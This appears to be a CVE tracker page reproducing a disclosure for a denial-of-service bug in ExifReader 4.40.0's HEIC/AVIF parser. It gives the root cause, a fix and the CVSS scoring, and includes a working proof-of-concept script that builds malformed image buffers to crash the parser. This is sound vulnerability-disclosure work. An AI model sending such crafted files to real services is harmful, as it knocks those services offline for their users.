Critical Alert 3 Active Exploits Detected Today

CVE-2026-58644 Microsoft SharePoint Deserialization of Untrusted Data Vulnerability →
CVE-2026-25089 Fortinet FortiSandbox OS Command Injection Vulnerability →
CVE-2026-39808 Fortinet FortiSandbox OS Command Injection Vulnerability →
Powered by CVE Watchtower
×

CVE Watchtower


← Back to CVE List

CVE-2026-53496NVD

Vulnerability Summary

## Summary

ExifReader 4.40.0 can throw an uncaught `RangeError: Offset is outside the bounds of the DataView` while parsing crafted HEIC/AVIF files. The file only needs a valid leading `ftyp` box with a HEIC/AVIF major brand followed by a malformed ISO-BMFF box, such as an empty 8-byte `free` box or a truncated extended-size box.

This is reachable through the public `ExifReader.load()` API for in-memory buffers and through the async file/URL loaders when an application parses attacker-supplied images. In applications that do not wrap every parse in a defensive try/catch, a single uploaded or fetched image can abort the request/worker and cause a denial of service.

Credit requested: Yaohui Wang.

## Affected version tested

- npm package: `exifreader`
- Version: `4.40.0`
- Repository commit tested: `8cb0261a26b7d986955fe0a6780f076dcb7902e7`

## Root cause

The ISO-BMFF parser assumes that every top-level box with at least an 8-byte header also has enough bytes for the fields required by its parsed form. In `src/image-header-iso-bmff.js`:

- `findMetaBox()` calls `parseBox(dataView, offset)` while only checking that `offset + 8 <= dataView.byteLength`.
- `parseBox()` calls `getBoxLength()` and then unconditionally reads fields such as the full-box version byte for `meta`/`iloc`/`iinf`/`idat` boxes.
- `getBoxLength()` handles `boxLength === 1` by calling `hasEmptyHighBits(dataView, offset)`, which reads `dataView.getUint32(offset + 8)` without first checking that the 64-bit extended size field is present.

As a result, syntactically small or truncated boxes after a valid HEIC/AVIF `ftyp` box escape the format-detection catch blocks and throw from the main parsing path.

## Reproduction

Run this from the repository root against the committed `dist/exif-reader.js` bundle:

```js
const ExifReader = require('./dist/exif-reader.js');

function u32be(n) {
return [(n >>> 24) & 255, (n >>> 16) & 255, (n >>> 8) & 255, n & 255];
}
function ascii(s) {
return Array.from(Buffer.from(s, 'ascii'));
}
function box(type, content = []) {
return [...u32be(8 + content.length), ...ascii(type), ...content];
}

for (const brand of ['heic', 'avif']) {
for (const badBox of ['free', 'abcd']) {
const bytes = Uint8Array.from([
...box('ftyp', ascii(brand)),
...box(badBox), // 8-byte box header with no content
]);

try {
ExifReader.load(bytes.buffer);
console.log(`${brand}/${badBox}: no throw`);
} catch (e) {
console.log(`${brand}/${badBox}: ${e.name}: ${e.message}`);
console.log(String(e.stack).split('\n').slice(0, 6).join('\n'));
}
}
}
```

Observed output on Node v23.11.0 with ExifReader 4.40.0:

```text
heic/free: RangeError: Offset is outside the bounds of the DataView
RangeError: Offset is outside the bounds of the DataView
at DataView.prototype.getUint8 (<anonymous>)
at parseBox (.../dist/exif-reader.js:1:16513)
at findMetaBox (.../dist/exif-reader.js:1:19032)
at findOffsets (.../dist/exif-reader.js:1:19101)

heic/abcd: RangeError: Offset is outside the bounds of the DataView
avif/free: RangeError: Offset is outside the bounds of the DataView
avif/abcd: RangeError: Offset is outside the bounds of the DataView
```

A second variant triggers the extended-size path:

```js
const truncatedExtendedBox = [...u32be(1), ...ascii('free')];
const heic = Uint8Array.from([...box('ftyp', ascii('heic')), ...truncatedExtendedBox]);
ExifReader.load(heic.buffer);
```

That throws from `hasEmptyHighBits()` / `getBoxLength()` because the extended-size high/low fields are not present.

## Expected behavior

Malformed/truncated metadata boxes should be handled like other malformed metadata in the project: return only the successfully parsed file type/metadata, return no app markers, or throw a controlled project-specific error. A safe JavaScript bounds error should not escape from the parser for an attacker-controlled image container.

## Security impact

This is a denial-of-service issue for services that parse user-provided HEIC/AVIF files with ExifReader. A minimal attacker-controlled image buffer can cause an unhandled exception in the parser and abort the surrounding request/worker if the embedding application does not catch every parse error.

Suggested severity: Medium. Suggested CVSS: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L`.

## Suggested fix

Add explicit bounds checks before every `DataView` read in the ISO-BMFF box parser, especially:

- before reading the 64-bit extended size fields in `getBoxLength()`;
- before reading the full-box version byte in `parseBox()`;
- before descending into `parseSubBoxes()` when a declared box length exceeds available bytes;
- ensure `findMetaBox()` breaks on boxes whose declared length is invalid or not fully present.

A regression test should cover `ftyp/heic` and `ftyp/avif` followed by an 8-byte empty `free`/unknown box and by a truncated extended-size box.
Severity Level
MEDIUM(5.3)
Published Date
Jul 17, 2026
Last Modified
Jul 17, 2026
Exploitation Status
No confirmed exploitation yet
EPSS Score (30-Day)
Data Pending
Root Weakness (CWE)
N/A
CVSS v3.1 Base Metrics
Attack VectorNetwork
Attack ComplexityLow
Privileges RequiredNone
User InteractionNone
ScopeUnchanged
ConfidentialityNone
IntegrityNone
AvailabilityLow

External References